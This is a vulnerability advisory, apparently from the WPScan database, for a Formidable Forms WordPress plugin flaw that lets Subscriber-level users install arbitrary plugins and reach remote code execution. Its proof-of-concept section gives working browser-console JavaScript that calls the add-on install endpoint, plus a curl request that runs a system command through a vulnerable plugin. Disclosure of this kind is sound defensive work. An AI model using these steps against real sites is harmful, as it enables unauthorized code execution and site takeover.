Lucene search

K
wpvulndbAlex SanfordWPVDB-ID:33765DA5-C56E-42C1-83DD-FCAAD976B402
HistoryJun 05, 2023 - 12:00 a.m.

Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

2023-06-0500:00:00
Alex Sanford
wpscan.com
15
formidable forms
remote code execution
wordpress org
plugin installation
user authorization
security vulnerability
javascript
browser exploit
wordpress plugin
rce
curl command

0.002 Low

EPSS

Percentile

60.1%

The plugin does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.

PoC

1. As a Subscriber user, visit /wp-admin/admin.php?page=formidable-welcome 2. Run the following JavaScript code in the browser console: var token = jQuery(‘a.button-primary.frm-button-primary’)[0].href.replace(/^.token=(\w+).$/, ‘$1’); await fetch( /wp-json/frm-admin/v1/install-addon?token=${token}&amp;file;_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip ); 3. Note that version 2.19 of the wp-upg plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here. 4. For RCE with the wp-upg plugin, run the following curl command: curl -i ‘https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field;=field:exec:id:NULL:NULL’

CPENameOperatorVersion
formidablelt6.3.1

0.002 Low

EPSS

Percentile

60.1%

Related for WPVDB-ID:33765DA5-C56E-42C1-83DD-FCAAD976B402